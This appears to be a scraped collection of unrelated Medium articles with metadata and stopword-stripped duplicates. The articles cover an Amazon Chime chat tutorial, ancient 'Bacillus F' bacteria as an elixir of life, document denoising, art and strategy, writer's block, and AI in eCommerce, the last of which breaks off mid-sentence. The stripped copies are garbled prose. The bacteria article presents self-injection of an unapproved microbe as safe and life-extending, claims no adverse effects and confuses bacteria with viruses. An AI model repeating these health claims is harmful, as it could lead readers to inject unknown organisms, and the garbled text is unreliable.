Title Add Chat Feature Demo Amazon Chime SDK React Component LibraryContent Add Chat Feature Demo Amazon Chime SDK React Component Library dannadori Follow Nov 30 · 7 min read Note article also available hereJapanese httpscloudflectcojpentry20201130125920 last article posted brief introduction Amazon Chime SDK React Component Library time writing latest update library ver 150 added Chatrelated component I’m going use add Chat functionality official AWS demo Like Note article bit complicated using React coding simply want run code URL repository given end article get code run First time add Chat functionality based demo provided official First make sure working sample ver 150 referring previous article Approach Generally Amazon Chime SDK React Component Library provides React component well hook provider Context APIs work behind component make easier use Amazon Chime’s feature addition Chatrelated component hoping would provide provider hook enable Chat functionality unfortunately haven’t yet issue say implement data message realtime signaling Please refer previous article data message realtime signaling would like implement provider us data message realtime signaling RealitimeSubscribeChatStateProvider name provider create RealtimeSubscribeChatStateProvider following brief description content provider excerpt think important entire source code found Call userealitimeSubscribeChatState provider refer Chat feature data Definition State Define State Chat function data provided userealitimeSubscribeChatState want create simple Chat function following two variable sufficient export interface RealitimeSubscribeChatStateValue chatData RealtimeData sendChatData mess string void RealtimeData used interface actual data sent received article defined following data structure export type RealtimeData uuid string data createdDate number senderName string snip useRealitimeSubscribeChatState method provide State follows creating provider using Context API think it’s almost formulaic won’t describe export const useRealitimeSubscribeChatState RealitimeSubscribeChatStateValue const state useContextRealitimeSubscribeChatStateContext state handle exception return state Definition Provider Sending receiving data message realtime signaling done AudioVideoFacade get reference AudioVideoFacade useAudioVideo 1–1 get username useAppState 1–2 user name retrieved useAppState 1–2 Chat text data managed provider using useState 1–3 2–1 define data transmission function using data message realtime signaling call method audioVideo AudioVideoFacade send data time specify “CHAT” specify topic 2–2 Also since sender can’t receive sent data add sent data Chat text data sending2–3 useEffect register deletes function receiving data message realtime signaling 3–1 3–2 receive function par received data add text data Chat shown 3–3 export const RealitimeSubscribeChatStateProvider child Props const audioVideo useAudioVideo 11 const localUserName useAppState 12 const chatData setChatData useState RealtimeData 13 const sendChatData text string 21 const mess RealtimeData uuid v4 data text createdDate new DategetTime senderName localUserName audioVideorealtimeSendDataMessageCHAT DataMessageType JSONstringifymess 22 setChatDatachatData mess 23 const receiveChatData mess DataMessage 33 const data JSONparsemesstext RealtimeData setChatDatachatData data useEffect audioVideorealtimeSubscribeToReceiveDataMessage 31 CHAT DataMessageType receiveChatData return audioVideorealtimeUnsubscribeFromReceiveDataMessageCHAT DataMessageType 32 const providerValue chatData sendChatData return RealitimeSubscribeChatStateContextProvider valueproviderValue child RealitimeSubscribeChatStateContextProvider GUI Next I’m going go part display Chat screen another excerpt think important Adding RealitimeSubscribeStateProvider Modify DOM MeetingView allow created provider used conference room Add realtimeSubscribeStateProvider 1 part allow Chat feature used subordinate Views const MeetingView useMeetingEndRedirect const showNavbar showRoster showChat useNavigation return UserActivityProvider StyledLayout showNavshowNavbar showRostershowRoster showChat RealitimeSubscribeStateProvider 1 StyledContent MeetingMetrics VideoTileGrid classNamevideos noRemoteVideoViewMeetingDetails MeetingControls StyledContent NavigationControl RealitimeSubscribeStateProvider StyledLayout UserActivityProvider ChatView 1 get chat data reference data sending function using userealitimeSubscribeChatState created earlier 2–1 2–2 use Chat component Amazon Chime SDK React Component Library generate display part later 3 call send function chat data const ChatView const localUserName useAppState const closeChat useNavigation const chatData sendChatData useRealitimeSubscribeChatState 1 const chatMessage setChatMessage useState const attendeeItems let c chatData 21 const senderName csenderName const text cdata const time new DateccreatedDatetoLocaleTimeStringjaJP attendeeItemspush ChatBubbleContainer timestamptime keytimesenderName 22 ChatBubble variant localUserName senderName outgoing incoming senderNamesenderName contenttext showTailtrue cssbubbleStyles ChatBubbleContainer return Roster classNameroster RosterHeader titleChat onClosecloseChat RosterHeader attendeeItems br Textarea tsignore onChangee setChatMessageetargetvalue valuechatMessage placeholderinput message typetext label styleresizevertical PrimaryButton labelsend onClicke setChatMessage sendChatDatachatMessage 3 Roster rest enable ChatView displayed navibar display navibar essential case contains several minor modification describe Please check change repository’s commit log Run let’s see work type message like you’ll see message screen person message outgoing variant attribute blue speech bubble message white speech bubble toggle display balloon’s tail cartoon term indicates balloon originates using tail attribute can’t change direction Otherwise omit time add action button Repository find source code one “chatfeature” branch following repository launch way way ran demo previous article check work Finally look adding chat functionality official Amazon Chime SDK React Component Library demo Although touch raw Amazon Chime SDK bit able create chat GUI consistent component without much effort addition chat function introduced following repository provide version whiteboard function Also Cognito integration virtual background implemented following repository Virtual Background WhiteboardTags JavaScript React AWS Videoconference
3,890
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life Are we meant to live eternally? Ancient bacteria from 3.5 million years ago also known as Bacillus F strain (Source: MIMS) For centuries, humans have been in the look for a source of eternity or a potion that can bring you back to your youth. Many legends and stories from ancient histories most probably inspired by witches show the possibility of becoming younger. In our philosophy, we see aging and dying as a natural phenomenon that is meant to be the way it is. However, some people are simply thirsty for eternal life. So much that they would even risk injecting themselves with this bacteria. Over the 21st century, there have been two recorded cases, of people injecting themselves with this bacteria as well as claiming that they are feeling younger and healthier. But before we go into these cases, we must have a look at what does this bacteria actually presents itself to be as well as it’s believed origin. Bacillus F This bacteria, known as Bacillus F was discovered in 2009 by researchers from Mammoth Mountain in the northern Siberian region of Yakutsk. From the analyses done by the University of Moscow, the bacteria seems to originate from around 3.5 million years ago, around when mammoths were alive. The bacteria has been closely studied and from the read on the DNA it presented, it seemed to have the potential of giving the injected organism longevity of life and an increase in fertility. The first organism to be tested with the bacteria was a couple of mice. The results were quite clear, all the mice that had been injected with the bacteria presented a longer lifespan. What is even more interesting is that the mice were also still fertile at a very old age. Epidemiologist Viktor Chernyavsky, who took part in the study mentioned that the bacteria gives out biologically active substances during its long life cycle or as long as the organism keeps it alive. As an expert, Chernyavsky had positively confirmed that the bacteria did give longevity within mice as well as enhanced the fertility within the mice tested. The first person to be injected with the bacteria Even if the tests showed that the bacteria does not harm the mice of an organism, it still was considered dangerous to have it introduced into a human organism, at least until more research was done. However, someone became impatient and wanted to know if this was the “elixir of life” as it was nicknamed by some of the scientists within the field. Anatoli Brouchkov (Source: Vice) Anatoli Brouchkov was from the department of geocryology, the department which focuses on the study of glacier regions and regions that have been permanently frozen. The scientist wanted to know the truth about the bacteria so bad that he injected himself with the bacteria with no permission from his higher-ups. Brouchkov knew that the bacteria wasn’t going to harm him as it can be found in the water from where it has been extracted in Siberia. This region has some secluded villages from which people have gathered and consumed the same water infested with the bacteria for years without causing them any harm. In an interview with Jordan Pearson from VICE, Brouchkov mentioned that the bacteria never affected him in a negative way, only positive. He mentioned that he wasn’t getting younger from a physical appearance, but he was feeling less tired as if he was younger and much healthier. We all know that with age, it is common to not only get tired much quicker but also get sick more often. Besides all this, the most interesting claim that Brouchkov made was that he didn’t suffer from any sort of sickness or illness for more than two years since injecting himself with the bacteria. Besides this virus being quite primitive for its age, the biological mechanism is extremely complex, making it very difficult for scientists even with the state of the art technology to understand the way it affects the organism it inhabits. Brouchkov ended his media appearance by stating that he does truly believe that the Bacillus F bacteria is the key to immortality. Besides this bacteria, there are many others that have been in a state of permafrost for hundreds of thousands of years with remarkable complexity. Many scientists define these bacterias to have been the cause of our ancestor’s great immune system and long lifespan. Another person taking the “elixir of youth” A more recent case was recorded in 2017 by a German actress know as Manoush. The only difference, in this case, is that Manoush took more doses over a period of three months. Since 2015, the research team from the University of Moscow had been able to unlock the DNA code of the bacteria, gaining even more information on its eternal abilities, but also confirming that the bacteria can live forever. Photo of Manoush and injection with the bacteria, 2017 (Source: Daily Mail) She claims that since taking the vaccine she has not only felt younger but is getting younger from a physical perspective. Although the idea of getting younger from a physical perspective is a bit more difficult to believe in her case due to all the plastic surgeries she had undergone in the previous years. There is still a possibility from a scientific point of view. The actress also mentioned that her skin feels much softer and what is most important is the fact that she would get hay fever every year (something common in many people). Since taking the bacteria she didn’t have hay-fever anymore, in fact, no type of illness or sickness just like in Brouchkov’s case. Scientists asked for blood samples from her every month during the three month period she injected herself with the bacteria. She has the desire of living until the age of 100 in a “fully functional body”. As there are no adverse effects from the injections with Bacillus F, she continues taking the bacteria.
https://medium.com/history-of-yesterday/the-3-5-million-year-old-bacteria-that-could-be-the-answer-to-eternal-life-a98e7c693759
['Andrei Tapalaga']
2020-12-25 21:02:41.238000+00:00
['Health', 'History', 'Science', 'Life', 'Medicine']
Title 35 MillionYearOld Bacteria Could Answer Eternal LifeContent 35 MillionYearOld Bacteria Could Answer Eternal Life meant live eternally Ancient bacteria 35 million year ago also known Bacillus F strain Source MIMS century human look source eternity potion bring back youth Many legend story ancient history probably inspired witch show possibility becoming younger philosophy see aging dying natural phenomenon meant way However people simply thirsty eternal life much would even risk injecting bacteria 21st century two recorded case people injecting bacteria well claiming feeling younger healthier go case must look bacteria actually present well it’s believed origin Bacillus F bacteria known Bacillus F discovered 2009 researcher Mammoth Mountain northern Siberian region Yakutsk analysis done University Moscow bacteria seems originate around 35 million year ago around mammoth alive bacteria closely studied read DNA presented seemed potential giving injected organism longevity life increase fertility first organism tested bacteria couple mouse result quite clear mouse injected bacteria presented longer lifespan even interesting mouse also still fertile old age Epidemiologist Viktor Chernyavsky took part study mentioned bacteria give biologically active substance long life cycle long organism keep alive expert Chernyavsky positively confirmed bacteria give longevity within mouse well enhanced fertility within mouse tested first person injected bacteria Even test showed bacteria harm mouse organism still considered dangerous introduced human organism least research done However someone became impatient wanted know “elixir life” nicknamed scientist within field Anatoli Brouchkov Source Vice Anatoli Brouchkov department geocryology department focus study glacier region region permanently frozen scientist wanted know truth bacteria bad injected bacteria permission higherups Brouchkov knew bacteria wasn’t going harm found water extracted Siberia region secluded village people gathered consumed water infested bacteria year without causing harm interview Jordan Pearson VICE Brouchkov mentioned bacteria never affected negative way positive mentioned wasn’t getting younger physical appearance feeling le tired younger much healthier know age common get tired much quicker also get sick often Besides interesting claim Brouchkov made didn’t suffer sort sickness illness two year since injecting bacteria Besides virus quite primitive age biological mechanism extremely complex making difficult scientist even state art technology understand way affect organism inhabits Brouchkov ended medium appearance stating truly believe Bacillus F bacteria key immortality Besides bacteria many others state permafrost hundred thousand year remarkable complexity Many scientist define bacteria cause ancestor’s great immune system long lifespan Another person taking “elixir youth” recent case recorded 2017 German actress know Manoush difference case Manoush took dos period three month Since 2015 research team University Moscow able unlock DNA code bacteria gaining even information eternal ability also confirming bacteria live forever Photo Manoush injection bacteria 2017 Source Daily Mail claim since taking vaccine felt younger getting younger physical perspective Although idea getting younger physical perspective bit difficult believe case due plastic surgery undergone previous year still possibility scientific point view actress also mentioned skin feel much softer important fact would get hay fever every year something common many people Since taking bacteria didn’t hayfever anymore fact type illness sickness like Brouchkov’s case Scientists asked blood sample every month three month period injected bacteria desire living age 100 “fully functional body” adverse effect injection Bacillus F continues taking bacteriaTags Health History Science Life Medicine
3,891
Denoising Noisy Documents
Numerous scientific papers, historical documentaries/artifacts, recipes, books are stored as papers be it handwritten/typewritten. With time, the paper/notes tend to accumulate noise/dirt through fingerprints, weakening of paper fibers, dirt, coffee/tea stains, abrasions, wrinkling, etc. There are several surface cleaning methods used for both preserving and cleaning, but they have certain limits, the major one being: that the original document might get altered during the process. I along with Michael Lally and Kartikeya Shukla worked on the data set of noisy documents if from the UC Irvine NoisyOffice Data Set. Denoising dirty documents enables the creation of higher fidelity digital recreations of original documents. Several methods for denoising documents like — Median Filtering, Edge Detection, Dilation & Erosion, Adaptive Filtering, Autoencoding, and Linear Regression are applied to a test dataset and their results are evaluated, discussed, and compared. Median Filtering Median filtering is the simplest denoising technique and it follows two basic steps: first, obtain the “background” of an image using Median Filtering with a kernel size of 23 x 23, then subtract the background from the image. Only the “foreground” will remain, clear of any noise that existed in the background. In this context, “foreground” is the text or significant details of the document and “background” is the noise, the white space between document elements.
https://towardsdatascience.com/denoising-noisy-documents-6807c34730c4
['Chinmay Wyawahare']
2020-07-01 06:10:04.068000+00:00
['Machine Learning', 'Computer Vision', 'Data Science', 'Neural Networks', 'AWS']
Title Denoising Noisy DocumentsContent Numerous scientific paper historical documentariesartifacts recipe book stored paper handwrittentypewritten time papernotes tend accumulate noisedirt fingerprint weakening paper fiber dirt coffeetea stain abrasion wrinkling etc several surface cleaning method used preserving cleaning certain limit major one original document might get altered process along Michael Lally Kartikeya Shukla worked data set noisy document UC Irvine NoisyOffice Data Set Denoising dirty document enables creation higher fidelity digital recreation original document Several method denoising document like — Median Filtering Edge Detection Dilation Erosion Adaptive Filtering Autoencoding Linear Regression applied test dataset result evaluated discussed compared Median Filtering Median filtering simplest denoising technique follows two basic step first obtain “background” image using Median Filtering kernel size 23 x 23 subtract background image “foreground” remain clear noise existed background context “foreground” text significant detail document “background” noise white space document elementsTags Machine Learning Computer Vision Data Science Neural Networks AWS
3,892
Questioning Things
I’ve long been a fan of the artist Grayson Perry. In my opinion he speaks a lot of sense, and has a great ability to make art seem more accessible. But I’ve gained even more of an appreciation recently. Mainly because I finally got round to reading his book — ‘Playing to the Gallery’. In it he debunks a lot of myths about the art world, what counts as art, and ways to view it. He also talks about the role of the contemporary artist. And in doing so there’s one thing which really stuck in my mind. He said; “my job is to notice things that other people don’t notice” It likely struck a chord, because ‘noticing things’ is an inherent character trait of strategists. So, it kind of goes with the territory. But it’s also because it highlighted one of the big reasons why I’m drawn to certain artworks over others. And that’s because of the artist’s ability to successfully notice, reframe and reflect the cultural psyche in a way that’s easy to understand and relate to, and, at best, completely change the way that you see something. So while noticing things is one thing, a large part of how impactful a piece of work is in how well it effectively communicates these otherwise ‘unnoticed’ things. How much it challenges, questions and reframes existing ideas. And importantly how much it resonates. This is as true of art, as it is of any kind of visual communications. But noticing, and communicating the most useful or relevant insight, or idea is easier said than done. It’s also somewhat of a strategist’s holy grail. So this got me thinking. How do artists notice things? And what, if anything, can we can learn from that? Noticing starts by asking interesting questions. And art is a great lesson in how to ask. As Ai Weiwei said: “I always think art is a tool to set up new questions. To create a basic structure which can be open to possibilities is the most interesting part of my work…” The ability to ask questions is one of the great powers of art. Both in terms of output (the idea or assumption the artist is questioning with their work) but also in terms of input (what kinds of questions they ask in the first place, and what possibilities it opens up). Asking a good question can make the difference between a great work and a flop. A mediocre piece, and a piece which stops you in your tracks. A piece which invites new conversation, and lays the path for things to come. The ability to ask questions is also a key part of a strategist’s toolbox — from questioning the brief (‘what problem are we trying to solve?’) to interviewing stakeholders and audiences to questioning the usefulness of an insight or idea. So, I started to look at how art asks questions, to see how that could help me in my day-to-day role. And in doing so I found three distinct themes that consistently crop up: Question what you see Question how you see Question what isn’t being seen Three powerful questions to ask when approaching any new challenge or client brief. Let’s unpack that a bit further. In order to ‘notice’ the interesting things, the ‘things that others don’t notice’, it’s important to look beyond the obvious. To forget what you know, and look at things through a fresh lens. To question what you see. Artists are masters of this. They constantly challenge themselves and their audience to forget their assumptions. Deliberately playing with perceptions of reality, to reframe the way that something is seen. The work of conceptual artist Joseph Kosuth is a prime example of this. He often commented on the gap between language, image and meaning in his work. ‘One and Three Chairs’, for example, simultaneously showcases a physical chair, a photograph of a chair and a written definition of a chair. On the surface all three chairs represent the same idea (the chair), yet are not the same at all. It’s a great lesson in not taking things at face value. And by stating the ‘obvious’ he successfully create the kind of ‘aha’ moment that leaves a lasting impression. When it comes to strategy, stopping to question what you see is key. Asking for example — What is the real question in the clients brief? What’s the real problem we’re trying to solve? and is what people say really what they mean? But it’s equally useful to question how you see. As Kosuth’s work shows — it’s important to be aware of our own filtering process (i.e. how we instinctively see things). But it’s also important to be aware of the filtering process which is happening all around us. So while Kosuth draws attention to the nuances of interpretation and assumption, he equally questions how something is represented impacts how it is seen. In part, this comes down to context. In art, as in marketing, context is critical. The format, time and surroundings through which an idea is delivered can completely shift its meaning, impact and relevance. So it’s pretty useful to consider when thinking about how to communicate the story that needs to be told. Christian Marclay’s mesmerising and award winning video piece ‘The Clock’ highlighted this all too well. Excerpt from ‘The Clock’ via YouTube In it he stitched together thousands of video clips of clocks, from film and TV history, and played them out in real-time over 24 hours. Taking the clips in isolation, he makes tiny ‘unnoticed’ moments the centrepiece. And by editing out complexity completely shifts the narrative. Making you consider the films, and the concept of time in a whole new way. As Paul Klee said — “Art does not reproduce the visible; rather, it makes visible”. And Marclay’s piece does a brilliant job of doing just that. So, finally, and importantly, as Klee reminds us - question what isn’t being seen. One of the great roles of art is to unlock, comment and shape culture. A lot of the time this involves, not just questioning what is in plain sight, but what is hidden from view. The Guerrilla Girls offer just one example of this. Coined ‘the conscience of the art world’ they are a group of anonymous feminist activist artists that “wear gorilla masks in public and use facts, humor and outrageous visuals to expose gender and ethnic bias as well as corruption in politics, art, film and pop culture”. As they say, “… we undermine the idea of a mainstream narrative by revealing the understory, the subtext, the overlooked, and the downright unfair”. Guerrilla Girls Images and Posters 1985–2018 via YouTube Questioning what isn’t seen, or noticed, is the core theme of their work. But it’s also one which has the power to create real cultural change. Seeping into mainstream culture, since 1985 they have tirelessly campaigned for change. Inspiring countless activist-artists and fans as they go. Questioning what isn’t being seen, or said, and making it visible is at the heart of any truly insightful piece of work. But when it comes down to it a lot of the most powerful work has an authenticity to it that’s truly relatable, meaningful, and memorable. It comes from expressing a central belief that is true to who the artist is. And creating a genuine connection with the person who’s viewing it. And when they ask the right questions they have the power to capture attention, shift perceptions, and, ultimately drive behavioural change. When it comes to working out the most useful way forward for brands, there’s something that can be learnt from that. Question what you see, Question how you see it, but importantly, Question what isn’t being seen. Often that’s where the most important messages lie.
https://medium.com/a-strategists-guide-to-art/questioning-things-b7aba5253828
['Harriet Kindleysides']
2020-11-12 10:13:58.308000+00:00
['Brand Strategy', 'Marketing', 'Strategy', 'Creativity', 'Art']
Title Questioning ThingsContent I’ve long fan artist Grayson Perry opinion speaks lot sense great ability make art seem accessible I’ve gained even appreciation recently Mainly finally got round reading book — ‘Playing Gallery’ debunks lot myth art world count art way view also talk role contemporary artist there’s one thing really stuck mind said “my job notice thing people don’t notice” likely struck chord ‘noticing things’ inherent character trait strategist kind go territory it’s also highlighted one big reason I’m drawn certain artwork others that’s artist’s ability successfully notice reframe reflect cultural psyche way that’s easy understand relate best completely change way see something noticing thing one thing large part impactful piece work well effectively communicates otherwise ‘unnoticed’ thing much challenge question reframes existing idea importantly much resonates true art kind visual communication noticing communicating useful relevant insight idea easier said done It’s also somewhat strategist’s holy grail got thinking artist notice thing anything learn Noticing start asking interesting question art great lesson ask Ai Weiwei said “I always think art tool set new question create basic structure open possibility interesting part work…” ability ask question one great power art term output idea assumption artist questioning work also term input kind question ask first place possibility open Asking good question make difference great work flop mediocre piece piece stop track piece invite new conversation lay path thing come ability ask question also key part strategist’s toolbox — questioning brief ‘what problem trying solve’ interviewing stakeholder audience questioning usefulness insight idea started look art asks question see could help daytoday role found three distinct theme consistently crop Question see Question see Question isn’t seen Three powerful question ask approaching new challenge client brief Let’s unpack bit order ‘notice’ interesting thing ‘things others don’t notice’ it’s important look beyond obvious forget know look thing fresh lens question see Artists master constantly challenge audience forget assumption Deliberately playing perception reality reframe way something seen work conceptual artist Joseph Kosuth prime example often commented gap language image meaning work ‘One Three Chairs’ example simultaneously showcase physical chair photograph chair written definition chair surface three chair represent idea chair yet It’s great lesson taking thing face value stating ‘obvious’ successfully create kind ‘aha’ moment leaf lasting impression come strategy stopping question see key Asking example — real question client brief What’s real problem we’re trying solve people say really mean it’s equally useful question see Kosuth’s work show — it’s important aware filtering process ie instinctively see thing it’s also important aware filtering process happening around u Kosuth draw attention nuance interpretation assumption equally question something represented impact seen part come context art marketing context critical format time surroundings idea delivered completely shift meaning impact relevance it’s pretty useful consider thinking communicate story need told Christian Marclay’s mesmerising award winning video piece ‘The Clock’ highlighted well Excerpt ‘The Clock’ via YouTube stitched together thousand video clip clock film TV history played realtime 24 hour Taking clip isolation make tiny ‘unnoticed’ moment centrepiece editing complexity completely shift narrative Making consider film concept time whole new way Paul Klee said — “Art reproduce visible rather make visible” Marclay’s piece brilliant job finally importantly Klee reminds u question isn’t seen One great role art unlock comment shape culture lot time involves questioning plain sight hidden view Guerrilla Girls offer one example Coined ‘the conscience art world’ group anonymous feminist activist artist “wear gorilla mask public use fact humor outrageous visuals expose gender ethnic bias well corruption politics art film pop culture” say “… undermine idea mainstream narrative revealing understory subtext overlooked downright unfair” Guerrilla Girls Images Posters 1985–2018 via YouTube Questioning isn’t seen noticed core theme work it’s also one power create real cultural change Seeping mainstream culture since 1985 tirelessly campaigned change Inspiring countless activistartists fan go Questioning isn’t seen said making visible heart truly insightful piece work come lot powerful work authenticity that’s truly relatable meaningful memorable come expressing central belief true artist creating genuine connection person who’s viewing ask right question power capture attention shift perception ultimately drive behavioural change come working useful way forward brand there’s something learnt Question see Question see importantly Question isn’t seen Often that’s important message lieTags Brand Strategy Marketing Strategy Creativity Art
3,893
5 Better Things to Do Instead of Staring at a Blank Page
Photo by Alessio Linon Unsplash 5 Better Things to Do Instead of Staring at a Blank Page When you’re stuck, take a break. Every writer feels stuck every once in a while. The words don’t seem to come up, and the few that do simply do not fit together. Your thoughts are either muddled or non-existent. Yet, you persist. You stare at the blank page, commanding your brain to come up with something, but it’s useless. Writing is something that’s just not happening for you today, and forcing it might actually make your writer’s block worse. Here’s 5 better things for you to do than insist on staring at that blank page: Go for a walk Walking is an effective way to relieve stress and boost creativity. Charles Dickens and Jane Austen are only a few of many writers known to have enjoyed long walks on a frequent basis. There’s something about the repetitive, rhythmic movements of walking that induces a meditative state. Recently, many authors’ instinctive preference for walking to induce creative output has been veryfied by science. Stanford researchers have found that “a person’s creative output increased by an average of 60 percent when walking.” (Source) A 60% increase in creative output is nothing to sneeze at. Going for a walk offers the added advantage of taking your eyes off the screen for a few minutes. It forces you to take a look at the world around you, and that alone might offer you the breakthrough you’ve been hoping for. Exercise While walking is a form of exercise, you can go one step further and do a more intense workout, such as running, biking, swimming, weightlifting. Exercising offers many benefits in improving cognitive function, not to mention your overall health. For me, an intense workout is the best form of meditation. While I can still “write in my head” while walking, when I go on a run my mind actually clears of all thought for a few minutes, and that creates the right mindset for welcoming new ideas. Post exercise, there’s a blissful exhaustion that makes me feel completely renewed and ready for another writing session. Talk to a friend Talking to a friend forces you get out of your own head for a few minutes. It’s easy to mistake isolating yourself with fostering a creativity-friendly environment. While writing is indeed a lonely occupation, sometimes breaking out of isolation is exactly what you need to get out of a creative rut. Talking to a friend brings you a new perspective about life. It reminds you that your blank page with its blinking cursor are not all that matters in the world. There are people out there who have other problems, other projects, other sources of joy. Reminding yourself of that every once in a while shifts your perspective and unlocks new ideas. Getting in touch with someone else’s reality helps you understand how you’ve blown your own creative rut out of proportion by focusing on it exclusively. Play — by yourself, with your kid, or with your pet “Play brings joy. And it’s vital for problem solving, creativity and relationships.” — Margarita Tartakovsky, M.S. We tend to think of play as only for children, but the reality is that adults benefit from play just as much. If you’re playing by yourself or with friends, try to pick something that doesn’t involve the use of screens, to give yourself a break from that. If you’re a parent, enjoy the opportunity to play with your kid. Children are not familiar with all the rules of the world yet, so they are less burdened by constraints on creativity. Ever seen a child paint a picture in which the grass is pink and the dog, green? Sure, grass isn’t pink in the “real world, “ but why can’t the grass be pink and the dog green in her world? When you get immersed in play with children, you begin to see things in an entirely new perspective. You become aware of your own arbitrary rules, and start to question yourself, why can’t things be different? If you’re not a parent yourself, play with a niece, a young cousin, or your friend’s kids (with permission and parental supervision, of course), or play with your pets. Pets are not the same as children, but you’d be surprised at all the creative ways cats and dogs play when you give them the freedom to be creative. My dog is always surprising me with how she choses to play with her toys — and with the stuff she thinks of as her toys (like my socks, or the toilet brush). If you don’t have a pet, you can ask a friend to let you play with theirs— most pet owners would appreciate the extra hand (I know I would), and there are plenty of animal shelters that allow volunteers to spend time playing with the animals. (Side note: always be careful letting children and animals play together. Make sure you know both the child and the animal well, and be careful to prevent any accidents. Your dog biting the neighbor’s kid is not going the outcome you want.) Cook Cooking is an excellent option to get your eyes off a screen and your hands into something tangible. As you focus on following a recipe, on measuring and preparing the right ingredients, on minding the stove and the oven so you don’t burn your food to a crisp, you’ll find that your mind contemplates ideas in the background, much like when walking or meditating. It doesn’t matter how skilled you are, you can always find a recipe that’s right at your level, besides, part of the fun of cooking is improving your skills and trying new things. If you’re a beginner, don’t put too much pressure on yourself to make something perfect: allow yourself to make mistakes. Embrace messing up as part of the process. When you’re stuck, get your mind out of writing Many writers mistakenly believe there’s only one solution to writer’s block, which is to push through, or to seek inspiration in writing-related activities, such as doing writing exercises or reading, but that’s not exactly true. In writing, there’s a time to push through, and a there’s a time to step away. With practice, you can easily identify the difference between these two moments. If if you suspect you’re stuck beyond the point where pushing through can help, step away from the computer. Turn your brain off of “writing mode,” release it to think of other things — or to simply not think at all. You’ll be surprised at what your brain can come up with after taking a break like that.
https://medium.com/a-life-of-words/5-better-things-to-do-instead-of-staring-at-a-blank-page-d1c4edf75ece
['Renata Gomes']
2020-07-15 21:01:44.645000+00:00
['Self', 'Writing Tips', 'Creativity', 'Writing', 'Self Improvement']
Title 5 Better Things Instead Staring Blank PageContent Photo Alessio Linon Unsplash 5 Better Things Instead Staring Blank Page you’re stuck take break Every writer feel stuck every word don’t seem come simply fit together thought either muddled nonexistent Yet persist stare blank page commanding brain come something it’s useless Writing something that’s happening today forcing might actually make writer’s block worse Here’s 5 better thing insist staring blank page Go walk Walking effective way relieve stress boost creativity Charles Dickens Jane Austen many writer known enjoyed long walk frequent basis There’s something repetitive rhythmic movement walking induces meditative state Recently many authors’ instinctive preference walking induce creative output veryfied science Stanford researcher found “a person’s creative output increased average 60 percent walking” Source 60 increase creative output nothing sneeze Going walk offer added advantage taking eye screen minute force take look world around alone might offer breakthrough you’ve hoping Exercise walking form exercise go one step intense workout running biking swimming weightlifting Exercising offer many benefit improving cognitive function mention overall health intense workout best form meditation still “write head” walking go run mind actually clear thought minute creates right mindset welcoming new idea Post exercise there’s blissful exhaustion make feel completely renewed ready another writing session Talk friend Talking friend force get head minute It’s easy mistake isolating fostering creativityfriendly environment writing indeed lonely occupation sometimes breaking isolation exactly need get creative rut Talking friend brings new perspective life reminds blank page blinking cursor matter world people problem project source joy Reminding every shift perspective unlocks new idea Getting touch someone else’s reality help understand you’ve blown creative rut proportion focusing exclusively Play — kid pet “Play brings joy it’s vital problem solving creativity relationships” — Margarita Tartakovsky MS tend think play child reality adult benefit play much you’re playing friend try pick something doesn’t involve use screen give break you’re parent enjoy opportunity play kid Children familiar rule world yet le burdened constraint creativity Ever seen child paint picture grass pink dog green Sure grass isn’t pink “real world “ can’t grass pink dog green world get immersed play child begin see thing entirely new perspective become aware arbitrary rule start question can’t thing different you’re parent play niece young cousin friend’s kid permission parental supervision course play pet Pets child you’d surprised creative way cat dog play give freedom creative dog always surprising choses play toy — stuff think toy like sock toilet brush don’t pet ask friend let play theirs— pet owner would appreciate extra hand know would plenty animal shelter allow volunteer spend time playing animal Side note always careful letting child animal play together Make sure know child animal well careful prevent accident dog biting neighbor’s kid going outcome want Cook Cooking excellent option get eye screen hand something tangible focus following recipe measuring preparing right ingredient minding stove oven don’t burn food crisp you’ll find mind contemplates idea background much like walking meditating doesn’t matter skilled always find recipe that’s right level besides part fun cooking improving skill trying new thing you’re beginner don’t put much pressure make something perfect allow make mistake Embrace messing part process you’re stuck get mind writing Many writer mistakenly believe there’s one solution writer’s block push seek inspiration writingrelated activity writing exercise reading that’s exactly true writing there’s time push there’s time step away practice easily identify difference two moment suspect you’re stuck beyond point pushing help step away computer Turn brain “writing mode” release think thing — simply think You’ll surprised brain come taking break like thatTags Self Writing Tips Creativity Writing Self Improvement
3,894
Top 5 Use Cases of AI in eCommerce
When Apple introduced its first iPhone — it was literally a shift in the paradigm of what we always viewed phones to be. Since then, there have been several significant evolutions in technology, but nothing can compare to the biggest of them all — Artificial Intelligence. Don’t agree? AI is having a bearing on almost every conceivable thing and I suppose I don’t even need to elucidate on the broad applications of this incredible new domain. Naturally, it was about time the benefits of AI be implicated in the most lucrative business of the 21st Century — eCommerce. Almost every significant step of commerce over the internet can be transformed by implementing AI. Every significant step like Visiting the retailer’s website, adding products to cart, Placing an order and even Checkout can be automated using the capabilities of AI. In this article, I would try and shed some light on the practical and significant use-cases of AI in eCommerce and how your eCommerce business can leverage it at this moment in time! There seems to be a lot of conundrum on the subject of AI in eCommerce, so let’s put an end to this discussion, once and for all, shall we? 5 Use-Cases of AI in eCommerce 1. Better Search Results It has been observed that customers end up abandoning their purchase because often the product results displayed turns out irrelevant. Through AI organizations are trying to display customer-centric search results that are relevant to their desired ask. eCommerce websites are increasingly leveraging NLP (or Natural Language Processing) and Image Recognition to better comprehend user language and produce better product results. Trending GoBeyond.ai articles: 2. Strategies Best Practices for Managing E-Commerce Customer Service 3. Top 15 Magento 2 Extensions For Your E-Commerce Site 4. How Free Influencers Took My Brand To Global Success Yandex, a popular search engine, successfully implemented some advanced applications of NLP and Deep Learning to optimize future searches with the help of the data of previous searches. This turned out to be a massive success as they were able to increase their click-through rates by almost ten percent. Clarifai is trying to improve ecommerce by building smarter applications that can see the world as people would. In their words, “Artificial Intelligence with a Vision.” These applications enable the developers to build more intelligent apps and at the same time empower business by providing a customer-centric experience. A demonstration of how Pinterest Lens work. Pinterest is partnering with ecommerce stores for its new offering Pinterest Lens to find matching items in the store directly from their image on Pinterest. This is great from the standpoint where people generally abandon their search because they aren’t able to find the relevant product. Developments such as these are not just helping businesses generate better revenues, but are also reducing customers’ journey. Recommended Read: 5 Tips to Ensure Impeccable Security for Your eCommerce Business 2. Shopping Experience Level 1001! How do you enhance the user’s shopping experience? Make it as real as possible! If you want to understand just how much Google knows about you, go check out your Google Maps Timeline! The devices that you use collect and store a ton of information about you. This data is extremely valuable as the right type of information can enrich and improve your shopping experience. Deep Learning and Machine Learning technologies are able to utilize the smallest piece of data. For instance, even the hover that you made over a product is analyzed and evaluated to understand the likelihood of you buying 